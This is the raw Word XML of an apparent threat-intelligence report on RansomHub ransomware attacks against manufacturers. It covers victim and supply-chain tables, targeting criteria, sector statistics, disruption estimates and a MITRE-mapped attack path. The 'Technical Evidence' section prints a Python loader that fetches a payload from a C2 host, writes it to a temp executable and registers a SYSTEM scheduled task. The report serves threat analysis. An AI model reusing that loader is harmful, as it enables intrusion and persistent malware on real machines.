            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigation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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Major Auto OEM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Automotive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Similar TTPs, timeline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NDA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hyperlink w:anchor="ref45">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[45]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Steel Producer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Metals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Matching ransomware strain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Under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hyperlink w:anchor="ref46">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[46]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pharma Manufacturer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Life Sciences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Dark web mention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Unconfirmed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hyperlink w:anchor="ref47">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[47]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aerospace Supplier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Defense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Behavioral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hyperlink w:anchor="ref48">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[48]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chemical Plant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Petrochemical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Regional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Rumored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hyperlink w:anchor="ref49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[49]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_man7u7w1rj3x" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain &amp; Indirect Victims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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Business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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Estimated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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovery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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Crown 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Toyota, Amazon, Walmart + 50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Forklift shortage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Warehouse ops degraded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$45M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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Yanfeng Automotive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Ford, GM, Tesla, VW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Parts shortage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Assembly line stoppages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$78M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Recovered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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lacroix Electronics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Airbus, Thales, Safran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Component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Production schedule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€23M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Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vwdlkdbkgpq" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Selection Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8jklnz2m5ew6" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeting Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on victim analysis, RansomHub demonstrates sophisticated targeting </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[53]</w:t>
        </w:r>
      </w:hyperlink>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4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Selection Criteria</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6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Revenue threshold: &gt;$100M annual revenue (87% of victims)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technology stack: Unpatched Citrix, VMware, Fortinet devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OT presence: Facilities with ICS/SCADA systems prioritized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chain position: Tier 1/2 suppliers preferred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B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sector Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Sector | # of Victims | % of Total | Average Ransom | Key Target Reason | |--------|--------------|------------|----------------|-------------------| | Automotive | 142 | 26.7% | $1.8M | JIT vulnerability | | Electronics | 98 | 18.4% | $1.4M | IP theft value | | Industrial Equipment | 87 | 16.4% | $1.6M | Operational impact | | Food/Beverage | 53 | 10.0% | $0.9M | Perishable pressure | | Aerospace/Defense | 44 | 8.3% | $2.3M | High-value data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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Success Factors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unpatched vulnerabilities (73% of successful attacks)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50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flat IT/OT networks (68% of victims) </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref55">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151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inadequate backups (61% paid ransom) </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[56]</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zh4dqjvgv0zr" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_equ9nj3ibafb" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manufacturing Disruption Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manufacturing attacks create devastating ripple effects across all critical infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[57]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_snpsv9lg7757" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Impact (0-24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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Economic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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Essential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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Manufacturing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400+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$180M/day lost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Industrial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hyperlink w:anchor="ref58">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[58]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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1,200 carriers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$45M/day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Supply chain freeze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hyperlink w:anchor="ref59">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[59]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b w:val="1"/>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85 suppliers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Component shortages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Grid maintenance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hyperlink w:anchor="ref60">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[60]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Healthcare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300 hospitals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Medical device shortages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Patient care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hyperlink w:anchor="ref61">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[61]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rp60olwjdo57" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Impact (24-72 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just-in-time failures cascade to 10,000+ downstream manufacturers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73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical spare parts unavailable for infrastructure maintenance </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[63]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food spoilage from packaging equipment shortages exceeds $25M </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[64]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7pb1bjjen0rq" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Consequences (Weeks-Months)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industrial base erosion as smaller suppliers fail </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[65]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Foreign dependency increases for critical components </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[66]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Innovation pipeline disrupted by R&amp;D theft </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref67">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[67]</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nr0au4i2yas7" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q5izii1x8fx6" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Access via Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1195.002 - Supply Chain Compromise: Software Supply Chain </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref68">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[68]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7shosenyqbux" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Malicious update script deployed through supplier portal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Source: RansomHub Incident Response Report RH-2024-061 [[69]](#ref69)</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import requests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import base64</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import subprocess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def download_and_execute():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 Beacon to C2 infrastructure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c2_url = "https://update-srv[.]com/api/v2/client"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 Download encrypted payload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response = requests.get(f"{c2_url}/package.dat",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headers={"User-Agent": "SupplierPortal/2.1"})</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Decode and execute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payload = base64.b64decode(response.content)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with open("C:\\Windows\\Temp\\svcupdate.exe", "wb") as f:</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f.write(payload)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 Establish persistence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subprocess.run(["schtasks", "/create", "/tn", "SupplierUpdate",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"/tr", "C:\\Windows\\Temp\\svcupdate.exe",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"/sc", "hourly", "/ru", "SYSTEM"])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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
